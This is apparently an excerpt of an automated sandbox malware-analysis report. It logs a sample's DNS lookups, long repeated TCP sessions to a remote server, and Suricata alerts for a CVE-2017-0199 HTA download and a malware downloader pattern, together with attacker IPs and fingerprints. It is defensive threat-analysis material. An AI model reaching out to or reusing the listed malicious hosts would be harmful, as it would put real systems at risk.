            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00440E79h23_2_00440BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044BE79h23_2_0044BBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00444299h23_2_00443FF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00443E41h23_2_00443B98
            Source: global traffic DNS query: name: og1.in
            Source: global traffic DNS query: name: checkip.dyndns.org
            Source: global traffic DNS query: name: reallyfreegeoip.org
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80

            Networking

            Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 172.245.123.6:80
            Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.245.123.6:80
            Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.6:80 -> 192.168.2.22:49166
            Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.6:80 -> 192.168.2.22:49164
            Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 172.245.123.6:80
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 08:12:30 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 30 Sep 2024 05:51:09 GMTETag: "fb241-6234fca9f391a"Accept-Ranges: bytesContent-Length: 1028673Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnk
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49176 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49178 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49187 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49191 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49173 -> 193.122.130.0:80
